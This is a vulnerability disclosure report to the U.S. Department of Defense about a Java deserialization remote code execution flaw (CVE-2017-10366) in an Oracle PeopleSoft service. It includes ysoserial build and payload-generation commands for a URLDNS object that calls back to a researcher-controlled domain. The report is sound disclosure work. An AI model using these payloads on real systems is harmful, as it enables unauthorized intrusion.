Remote Code Execution (RCE) in a DoD website Share: Timeline joaomatosf submitted a report to U.S. Dept Of Defense. March 24, 2018, 2:59am UTC

SUMMARY: The DoD https://███/psc/EXPROD/ Web System uses the Oracle PeopleSoft platform which is vulnerable to Remote Code Execution (RCE) and Denial of Service Attacks (DoS) over a Java Object Deserialization (CWE-502) in the “monitor” service. Thus an attacker can generate and send malicious java objects of special types to your system and achieve arbitrary effects (such as RCE os DoS) during their deserialization (the objects are deserialized by readObject() method without any type of validation). This is related to CVE-2017-10366 [1]. PROOF OF CONCEPT For PoC I sent a special serialized java object in order to force the vulnerable server to perform a DNS Lookup for a domain controlled by me (dod.jexboss.info). In this way, if the code is executed successfully by the DoD server I will receive a DNS query from DoD and see it in the logs of my BIND daemon (the vulnerable DoD server will perform a local DNS query for dod.jexboss.info and the local DNS will try to query the authoritative nameserver for the jexboss.info domain (ns1.jexboss.info), which is mine). For more details about this payload used, see [2]. Attached is a video detailing the PoC. Generating the payload: for generate the payload I used the tool ysoserial. Code 197 BytesUnwrap lines Copy Download $ git clone https://github.com/frohoff/ysoserial.git $ cd ysoserial $ mvn clean package –DskipTests $ cd target $ java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://dod.jexboss.info > payload